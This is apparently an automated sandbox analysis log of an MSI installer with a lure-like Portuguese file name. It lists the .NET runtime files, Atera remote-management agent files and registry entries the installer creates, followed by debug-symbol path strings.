                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.DataSetExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Requests.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tools.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.AppContext.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Sockets.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.NonGeneric.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-namedpipe-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.HttpUtility.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-interlocked-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-profile-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Debug.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorlib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Concurrent.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TextWriterTraceListener.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-handle-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Watcher.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.XDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NameResolution.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encodings.Web.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Drawing.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.DataAnnotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.EventBasedAsync.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.RegularExpressions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.Vectors.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Dynamic.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.Win32.Registry.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Claims.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\hostpolicy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Writer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Csp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TraceSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.DataContractSerialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Mail.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordbi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.TypeExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.X509Certificates.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-localization-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlSerializer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Thread.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.DriveInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore_amd64_amd64_6.0.3224.31407.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Process.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.ReaderWriter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-libraryloader-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-sysinfo-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Loader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-environment-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.Common.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Intrinsics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ObjectModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.ResourceManager.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.ILGeneration.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Serialization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.VisualC.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.UnmanagedMemoryStream.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Formats.Asn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Channels.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-timezone-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Quic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-runtime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Dataflow.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.Local.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Console.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Formatters.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tracing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\dbgshim.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-locale-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\WindowsBase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clrjit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-datetime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Cng.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Calendars.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-2-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.NETCore.App.runtimeconfig.json
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-string-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clretwrc.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.Unsafe.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceModel.Web.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.SecureString.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.CSharp.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Numerics.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-memory-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Encoding.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.FileVersionInfo.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Contracts.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l2-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorrc.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.RuntimeInformation.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Primitives.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Ping.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceProcess.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Primitives.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.AccessControl.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Annotations.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.DiagnosticSource.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-stdio-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.ThreadPool.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.CoreLib.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.CodePages.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\.version
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.Lightweight.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-process-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\host
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\host\fxr
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\host\fxr\6.0.32
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\dotnet.exe
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\LICENSE.txt
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\ThirdPartyNotices.txt
                                Source: C:\Windows\System32\msiexec.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\AteraSetupLog.txt
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files\dotnet\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000E.00000002.1447177311.000001E7283F2000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll0.2.dr
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000E.00000002.1447177311.000001E7283F2000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll0.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdb source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: CliWrap.pdbSHA256X source: CliWrap.dll.26.dr
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: TRABALHO----PROCESSO0014S55-S440000000S1.msi
